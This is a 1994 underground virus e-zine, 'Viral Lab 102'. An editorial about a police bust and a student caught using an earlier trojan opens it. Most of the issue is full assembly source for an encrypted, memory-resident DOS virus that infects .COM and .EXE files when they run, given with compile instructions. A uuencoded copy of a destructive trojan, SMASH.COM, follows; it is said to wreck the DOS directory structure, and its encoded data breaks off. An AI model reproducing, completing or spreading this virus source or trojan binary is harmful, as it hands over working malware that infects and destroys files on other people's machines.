Viral Lab 102 May 1994 CONTENTS: Editorial VIRAL LAB 102's VIRUS #1 SOURCE SMASH.COM Trojan Horse of the month Afterword After-Afterword: Jerusalem-A debug script EDITORIAL By Spear Well, here it is! The long awaited (maybe) #2 issue of Viral Labs! You may wonder why your name was not on the mailing list. That's because we are going to not have a mailing list at all. When you want it, you gotta mail here for it. The reason for this is because when we got busted after last issue, for reasons which will be explained later in this editorial, the piggies tried to implicate some of the people that were on our mailing list. These people's names will not be mentioned, but the mailing list was submitted as evidence in the case surrounding a group of people and their packet-sniffing project. It was supposedly supposed to be valid proof that they were people who enjoyed reaking havoc on systems around the net. Also, some stupid kid decided to put the trojan horse that was in the last issue onto his network in substitute for the executeable file for word-perfect. He got caught pretty fast, because of the fact that he wrote the source code and put his name in it. He had some dumb copyright thing in it, and when the labbies at his college viewed it with a hex-editor, lo and behold! The program is named! Plus he bragged all about school about it and accidentally told people who didn't really care if he got kicked out of school or not. Bummer. The moral of this story is, only use this mag for entertainment and education purposed only! Otherwise! You're going to get caught. The other moral is, if you have a e-mag, don't keep a file with people's subscriptions in it laying around the system. VIRAL LAB 102's VIRUS #1 By Spear ATTRIBUTES: This is a memory resident .com and .exe infector. It is encrypted using a method much like that of DA's methods of encryption. The maximum size of this virus is 1000 bytes, which is fairly tiny. This virus only spreads, there are no trojan horses in it in order to keep it small. It is of the tiny class of virii that P/S creates often. Everytime a file containing this virus is executed, it infects 10 other files on the system. Infects command.com as well. Compile using TASM in non-case sensitive mode. ;Viral Lab 102 Virus of the Month Source code. checkres1 = 'DA' checkres2 = 'PS' id = 'DA' .model tiny .code org 0000h start: ENCRYPT: patchstart: mov bx, offset endencrypt mov cx, (heap-endencrypt)/2+1 encrypt_loop: db 002Eh ; cs: db 0081h ; add word ptr [bx], xxxx xorpatch db 0007h encryptvalue dw 0000h add bx, 0002h loop encrypt_loop endencrypt: call next next: pop bp sub bp, offset next push es push ds mov ax, checkres1 ; Installation check int 0021h cmp ax, checkres2 ; Already installed? jz done_install mov ax, ds dec ax mov ds, ax sub word ptr ds:[0003h], ((endheap-start+1023)/1024)*64 sub word ptr ds:[0012h], ((endheap-start+1023)/1024)*64 mov es, word ptr ds:[0012h] push cs pop ds xor di, di mov cx, (heap-start)/2+1 ; Bytes to move mov si, bp ; lea si,[bp+offset start] rep movsw xor ax, ax mov ds, ax sub word ptr ds:[0413h], (endheap-start+1023)/1024 push ds lds ax, ds:[21h*4] ; Get old int handler mov word ptr es:oldint21, ax mov word ptr es:oldint21+2, ds pop ds mov word ptr ds:[21h*4], offset int21 ; Replace with new handler mov ds:[21h*4+2], es ; in high memory done_install: pop es pop ds cmp sp, id je restore_EXE restore_COM: mov di, 0100h push di lea si, [bp+offset old3] movsw movsb ret restore_EXE: mov ax, ds add ax, 0010h add cs:[bp+word ptr origCSIP+2], ax add ax, cs:[bp+word ptr origSPSS] cli mov ss, ax mov sp, cs:[bp+word ptr origSPSS+2] sti db 00EAh origCSIP db ? old3 db 0cdh,20h,0 origSPSS dd ? int21: push ax push bx push cx push dx push si push di push ds push es cmp ax, 4B00h ; execute? jz execute return: jmp exitint21 execute: mov word ptr cs:filename, dx mov word ptr cs:filename+2, ds mov ax, 4300h lds dx, cs:filename int 0021h jc return push cx push ds push dx mov ax, 4301h ; clear file attributes push ax ; save for later use xor cx, cx int 0021h mov ax, 3D02h lds dx, cs:filename int 0021h xchg ax, bx push cs pop ds push cs pop es mov ax, 5700h ; get file time/date int 0021h push cx push dx mov cx, 001Ah mov dx, offset readbuffer mov ah, 003Fh int 0021h mov ax, 4202h xor cx, cx xor dx, dx int 0021h cmp word ptr [offset readbuffer], 'ZM' jz checkEXE mov cx, word ptr [offset readbuffer+1] ; jmp location add cx, heap-start+3 ; convert to filesize cmp ax, cx ; equal if already infected jz jmp_close cmp ax, 03E8h ; check if too large ja jmp_close ; Exit if so mov di, offset old3 mov si, offset readbuffer movsb movsw mov si, ax ; save entry point add si, 0100h mov cx, 0003h sub ax, cx mov word ptr [offset readbuffer+1], ax mov dl, 00E9h mov byte ptr [offset readbuffer], dl jmp short continue_infect checkEXE: cmp word ptr [offset readbuffer+10h], id jnz skipp jmp_close: jmp close skipp: lea di, origCSIP lea si, readbuffer+14h movsw ; Save original CS and IP movsw sub si, 000Ah movsw ; Save original SS and SP movsw push bx ; save file handle mov bx, word ptr [readbuffer+8] ; Header size in paragraphs mov cl, 0004h shl bx, cl push dx ; Save file size on the push ax ; stack sub ax, bx ; File size - Header size sbb dx, 0000h ; DX:AX - BX -> DX:AX mov cx, 0010h div cx ; DX:AX/CX = AX Remainder DX mov word ptr [readbuffer+14h], dx ; IP Offset mov word ptr [readbuffer+10h], id ; Initial SP mov word ptr [readbuffer+0Eh], ax ; Para disp stack segment mov word ptr [readbuffer+16h], ax ; Para disp CS in module. mov si, dx ; save entry point pop ax ; Filelength in DX:AX pop dx add ax, heap-start adc dx, 0000h mov cl, 0009h push ax shr ax, cl ror dx, cl stc adc dx, ax pop ax and ah, 0001h mov word ptr [readbuffer+2], ax ; the EXE header. mov word ptr [readbuffer+4], dx ; Fix-up the file size in pop bx ; restore file handle mov cx, 001Ah continue_infect: push cx ; save # bytes to write mov ah, 002Ch ; Get current time int 0021h add si, (offset endencrypt-offset encrypt) mov word ptr ds:[patchstart+1], si mov word ptr ds:[encryptvalue], dx mov di, offset encryptbuffer mov si, offset ENCRYPT mov cx, (heap-encrypt)/2 push si rep movsw ; copy virus to buffer mov ax, offset endencrypt-encrypt+encryptbuffer mov word ptr ds:[patchstart+1], ax pop si push offset endencrypt mov byte ptr [offset endencrypt], 00C3h ; retn xor byte ptr [offset xorpatch-encrypt+encryptbuffer], 0028h push bx call si ; encrypt virus in buffer pop bx pop word ptr [offset endencrypt] xor byte ptr [offset xorpatch], 0028h mov ah, 0040h mov cx, heap-encrypt mov dx, offset encryptbuffer int 0021h mov ax, 4200h xor cx, cx cwd int 0021h mov dx, offset readbuffer pop cx mov ah, 0040h int 0021h close: mov ax, 5701h ; restore file time/date pop dx pop cx int 0021h mov ah, 003Eh int 0021h pop ax ; restore file attributes pop dx ; get filename and pop ds pop cx ; attributes from stack int 0021h exitint21: pop es pop ds pop di pop si pop dx pop cx pop bx pop ax db 00EAh ; return to original handler oldint21 dd ? heap: encryptbuffer db (heap-encrypt)+1 dup (?) filename dd ? readbuffer db 1ah dup (?) endheap: end start TROJAN HORSE OF THE MONTH: This trojan takes all the files in the \dos directory and copies them as files, which totally ruins the file structure of the system. In order to fix this, a person will have to format his hard-drive because DOS commands are rendered inexecutable and you cannot remove the directories they are in. They are invalid directories, and no matter what is done, a person who is inflicted with this puppy cannot remove the directories or get rid of them without using norton utilities to fix the invalid chains. In order to get the file out of this puppy, in your unix account, type uudecode after clipping here... -------clip clip clip--------------------------------------- begin 644 smash.com MZ:,`&BHN*@`J`%P````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````````````````````````````````````````+]J`KYJ`KD)`/RL-)*J M2>,"Z_>Z3`&T<AM!G-(8K0_L*T1[X,`D'`+1/N@@!Z_*Z:@&T.\TAM"_-(8P&H@&)'J0!S2&Z=P&T<AN0<`N@0! MM$[-(7(FN`%#,\FZE0'-(7(OM#S-(7(IB]AR$+1!S2&T/LTAM#G-(;1/Z]:T M&HX>H@&+%J0!S2&Z"@&T.\TAZY:T.[H*`